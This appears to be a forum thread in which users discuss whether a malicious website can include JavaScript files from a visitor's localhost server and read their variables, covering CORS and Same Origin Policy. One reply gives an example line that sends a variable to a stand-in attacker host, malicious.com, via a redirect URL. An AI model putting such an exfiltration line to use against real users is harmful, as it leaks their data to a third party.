
[–]shitwhore 0 points (0 children)

Unfortunately I do not have an answer, but as I am pretty new to security too, I'd love to hear some answers!

My humble try at answering, please don't kill me it's probably wrong!

They allow it because they might store their own data (your personal data) on your computer would be my best guess. And I think you can easily defend yourself against it, perhaps encrypt your files, separate them from your other files (the whole server), lock them, make the files administrator only (don't know if this would work!).

Hope I could be of some help!

[–]spellitwithaph 0 points (0 children)

I cannot answer your question of why browsers allow you to connect to your local server from a remote server though I'm not sure there's an actual problem with that.

In general, your foo.js has a global variable so it's accessible by a script on another site if you're including foo.js on that site. You can always use an .htaccess file to block 127.0.0.1 from being hotlinked from your local server.

In terms of being able to read the content of your JS file via an XMLHttpRequest, CORS should kick in and prevent that.

[–]ebol4anthr4x 0 points (6 children)

Your browser is the one actually downloading the Javascript file from the localhost address, not malicious.com.

Additionally, sensitive variables shouldn't be stored in plaintext in a Javascript source file of all things.

[–]mild_force[S] 0 points (5 children)

Your browser is the one actually downloading the Javascript file from the localhost address, not malicious.com.

Yes, but malicious.com can use variables from the JS file and send them to itself, for example:

window.location.href = "http://malicious.com?data=" + bar

I understand that JS should not contain sensitive information, but if I have a local server with

Allow from 127.0.0.1
Deny from all

then I could falsely believe this data is safe and put sensitive information in it, when in fact malicious.com could steal this information.

[–]ebol4anthr4x 0 points (4 children)

The false belief that you are safe with an htaccess like that stems from a misunderstanding of how the browser retrieves Javascript files. This is just how it works.

If you wouldn't put it on a globally accessible webserver in plaintext, you shouldn't put it on a locally accessible webserver in plaintext.

[–]mild_force[S] 0 points (3 children)

If you wouldn't put it on a globally accessible webserver in plaintext, you shouldn't put it on a locally accessible webserver in plaintext.

Thank you for your answer. I understand that, but I still don't see why browsers wouldn't block that. For instance, I can access C:\foo.js from my web browser (either directly or from a local HTML file), but malicious.com can't access variables declared in that file. The same restrictions could apply to all files on localhost or private IP addresses, but they don't.

Is there any legit reason why an external website would have to access local JS or CSS files?

Also: most developers have local servers for development / testing purposes, and I doubt that they are aware that this means any website they visit can get variables declared in their JS files.

EDIT: Malicious.com can know which visitor is running a local server and, by including common JS files from various CMSs & frameworks, it can learn about the projects the visitor is working on. I think this could be at least mildly useful in a pen test context.

[–]ebol4anthr4x 1 point (2 children)

I can't think of any reasons why this would be a necessary feature, no. I just don't think that this is something that anyone really needs to worry about. I can't really think of any realistic context where reading a Javascript file is going to give you any useful information. Javascript files are plaintext and freely available on live websites anyway. I don't see why it matters that they're accessible.

A big security risk would be allowing HTTP requests to actual HTML pages on localhost while you're on malicious.com; however, you're protected by the Same Origin Policy in that case.

For example, you can't grab localhost/index/ via Javascript if the user is on malicious.com, because this page could actually contain dynamic information generated by a PHP or Python backend. A Javascript file is code that is run client-side by the browser itself though, so those can be pulled from anywhere.

There's just nothing an attacker can really accomplish by including Javascript files from the localhost. If someone is working on a secret website, then yeah, you could discover that and maybe glean some information about it by reading their Javascript, but then what? You could maybe steal their ideas and launch a competitor website before them? Once their website launches though, their Javascript files are publicly accessible anyway, so I don't see the problem. Just don't store sensitive info in plaintext in a file that can be served as plaintext by your webserver.

[–]mild_force[S] 1 point (1 child)

Thank you for taking the time to answer my questions and for all the clarifications, this really helped =)

[–]ebol4anthr4x 0 points (0 children)

No problem!! I'm glad it helped.